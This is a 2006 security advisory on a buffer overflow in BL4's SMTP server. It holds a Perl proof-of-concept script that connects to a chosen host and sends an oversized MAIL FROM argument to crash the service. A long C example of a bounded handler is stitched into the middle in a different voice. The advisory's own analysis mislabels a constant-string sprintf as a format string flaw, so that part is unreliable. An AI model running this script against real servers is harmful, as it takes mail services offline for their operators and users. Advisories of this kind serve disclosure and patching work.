
BL4's SMTP server BufferOverflow Vulnerable



---------------------------------------------------------------------------
[ECHO_ADV_30$2006] BL4's SMTP server BufferOverflow Vulnerable
---------------------------------------------------------------------------

Author       : Dedi Dwianto
Date         : April, 27th 2006
Location     : Indonesia, Jakarta
Web          : http://advisories.echo.or.id/adv/adv30-theday-2006.txt
Critical Lvl : High
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Application : BL4's SMTP server
version     : < 0.1.5
URL         : http://bl4qkubartnndfhr.emmeya.com/prog/smtp?0
Description :

BL4's SMTP server is an inbound only SMTP server.
It currently uses hardcoded values for handling email. 
The SMTP server puts the incoming email into various text files.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~~~
BL4's SMTP server is prone to a flaw that can allow a remote attacker to
cause a denial of service or to execute arbitrary code.
The vulnerability is due to a buffer overflow in the SMTP service.
A remote attacker can repeatedly send more than 2100 bytes as the argument to
the HELO, MAIL FROM, and RCPT TO commands to crash the server.

------------------think.c-----------------------------------
                ...........
                {
                        slaveEmail[x]->isData = 0;
                        slaveEmail[x]->emailFrom = 0;
                        slaveEmail[x]->emailTo = 0;
                        free(buffer);
                        buffer = malloc(sizeof(char) * 12);
                        sprintf(buffer, "250 OK\r\n");
                        return buffer;
                }
                free(buffer);
                .............
                slaveEmail[x]->EHLO = buffer;
                slaveEmail[x]->EHLOtrue = 1;

                buffer = malloc(sizeof(char) * 12);
                sprintf(buffer, "250 OK\r\n"); 
                return buffer;
-----------------------------------------------------------
        --
        sprintf(buffer, "250 OK\r\n");
        --
        Vulnerable to format string attacks.

        --
        free(buffer);
        buffer = malloc(sizeof(char) * 12);
        --
        Vulnerable to buffer overflow.
An attacker can execute arbitrary code here.
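For contrast, a bounded handler for the same three commands, written here as an added example and not code from BL4's server: the raw line length is checked against the RFC 5321 limits before anything is copied, the fixed-size session fields are only ever filled through a length-checked copy, and replies are written with snprintf through a constant "%s" format. The names smtp_session, smtp_handle_line and smtp_probe_mail_from are this example's own. smtp_probe_mail_from builds a constructed "MAIL FROM:" line of a chosen argument length and feeds it to the handler, so the 2100-byte case from the advisory can be checked offline without a network.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical bounded SMTP command handler (added example, not BL4 code). */

#define SMTP_MAX_LINE 512  /* RFC 5321 4.5.3.1.4: command line incl. CRLF     */
#define SMTP_MAX_PATH 256  /* RFC 5321 4.5.3.1.3: reverse-path / forward-path */

struct smtp_session {
    char ehlo[SMTP_MAX_LINE];      /* fixed-size fields, only bounded-copied into */
    char mail_from[SMTP_MAX_PATH];
    char rcpt_to[SMTP_MAX_PATH];
    char reply[64];
};

struct smtp_session demo_session;  /* session used by the stand-alone main below */

/* Case-insensitive test that line[0..len) starts with verb (uppercase). */
static int has_verb(const char *line, size_t len, const char *verb)
{
    size_t n = strlen(verb);
    if (len < n)
        return 0;
    for (size_t i = 0; i < n; i++)
        if (toupper((unsigned char)line[i]) != (unsigned char)verb[i])
            return 0;
    return 1;
}

/* Copy src[0..len) into dst[cap] with a NUL; refuse (and copy nothing) when
   the argument is empty or would not fit. This is the check an overflowing
   server lacks: the caller decides on length before any byte moves. */
static int bounded_copy(char *dst, size_t cap, const char *src, size_t len)
{
    if (len == 0 || len >= cap)
        return -1;
    memcpy(dst, src, len);
    dst[len] = '\0';
    return 0;
}

/* Reply text always goes through a constant "%s" format and a bounded
   snprintf, so it is neither a format string nor an overflow source. */
static int reply(struct smtp_session *s, int code, const char *text)
{
    snprintf(s->reply, sizeof s->reply, "%s", text);
    return code;
}

/* Handle one raw client line (len bytes, CRLF included, not NUL-terminated).
   Returns the SMTP reply code. Over-long lines are rejected up front. */
int smtp_handle_line(struct smtp_session *s, const char *line, size_t len)
{
    if (len > SMTP_MAX_LINE)
        return reply(s, 500, "500 Line too long\r\n");

    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n'))
        len--;                                   /* strip trailing CRLF */

    if (has_verb(line, len, "HELO ") || has_verb(line, len, "EHLO ")) {
        if (bounded_copy(s->ehlo, sizeof s->ehlo, line + 5, len - 5) != 0)
            return reply(s, 501, "501 Syntax error in parameters\r\n");
        return reply(s, 250, "250 OK\r\n");
    }
    if (has_verb(line, len, "MAIL FROM:")) {
        if (bounded_copy(s->mail_from, sizeof s->mail_from, line + 10, len - 10) != 0)
            return reply(s, 501, "501 Path missing or too long\r\n");
        return reply(s, 250, "250 OK\r\n");
    }
    if (has_verb(line, len, "RCPT TO:")) {
        if (bounded_copy(s->rcpt_to, sizeof s->rcpt_to, line + 8, len - 8) != 0)
            return reply(s, 501, "501 Path missing or too long\r\n");
        return reply(s, 250, "250 OK\r\n");
    }
    return reply(s, 500, "500 Command unrecognized\r\n");
}

/* Convenience wrapper for NUL-terminated lines. */
int smtp_handle_cstr(struct smtp_session *s, const char *line)
{
    return smtp_handle_line(s, line, strlen(line));
}

/* Offline probe: constructed "MAIL FROM:" + n filler bytes + CRLF.
   Returns the reply code the handler produces for that input. */
int smtp_probe_mail_from(size_t n)
{
    static char line[8192];
    struct smtp_session s;
    if (n + 12 > sizeof line)
        return -1;
    memcpy(line, "MAIL FROM:", 10);
    memset(line + 10, 'A', n);
    memcpy(line + 10 + n, "\r\n", 2);
    return smtp_handle_line(&s, line, n + 12);
}

int main(void)
{
    int code = smtp_handle_cstr(&demo_session, "EHLO yahoo.com\r\n");
    printf("EHLO -> %d, stored '%s'\n", code, demo_session.ehlo);
    printf("MAIL FROM, 2100-byte argument -> %d\n", smtp_probe_mail_from(2100));
    printf("MAIL FROM,  300-byte argument -> %d\n", smtp_probe_mail_from(300));
    return 0;
}
```

A 2100-byte argument is refused at the line-length check with 500 before the handler looks at the verb; a 300-byte path fits the line limit but not the path field, so it is refused with 501 and the field is left untouched.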


Poc:
~~~~~~~~~~~~

#!/usr/bin/perl
# PoC from the advisory: send an over-long MAIL FROM argument to crash the server.

use strict;
use warnings;
use IO::Socket::INET;

usage() if @ARGV < 1 || @ARGV > 2;

my $adr = $ARGV[0];
my $prt = defined $ARGV[1] ? $ARGV[1] : 25;    # default SMTP port

my $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $adr,
    PeerPort => $prt, Reuse => 1) or die "Error: can't connect to $adr:$prt\n";

print " -- Connecting To SMTP server at $adr port $prt ... \n";
sleep(1);

print $socket "EHLO yahoo.com\r\n" or die "Error : can't send Request\n";
print " -- Sending Request to $adr .....\n";
sleep(1);

# argument far beyond the 2100-byte threshold given above
print $socket "MAIL FROM:" . "jessy" x 4600 . "\r\n"
    or die "Error : can't send Buffer\n";
print " -- Sending Buffer to $adr .....\n";
sleep(1);

printf("[+]Ok!\n");
printf("[+]Crash service.....\n");
printf("[~]Done.\n");

close($socket);

sub usage {
    print "\n=========================================\r\n";
    print "     BL4's SMTP server Remote DOS \r\n";
    print "=========================================\r\n";
    print "       Bug Found by Dedi Dwianto \r\n";
    print "    www.echo.or.id #e-c-h-o irc.dal.net \r\n";
    print "      Echo Security Research Group \r\n";
    print "=========================================\r\n";
    print " Usage: perl bl4-explo.pl [target] [port] \r\n\n";
    exit();
}


---------------------------------------------------------------------------
Shoutz:
~~~~~~~

~ y3dips,moby,comex,z3r0byt3,K-158,c-a-s-e,S`to,lirva32,anonymous
~ newbie_hacker@xxxxxxxxxxxxxxx
~ #aikmel #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~~~

     Dedi Dwianto || echo|staff || the_day[at]echo[dot]or[dot]id
     Homepage: http://theday.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------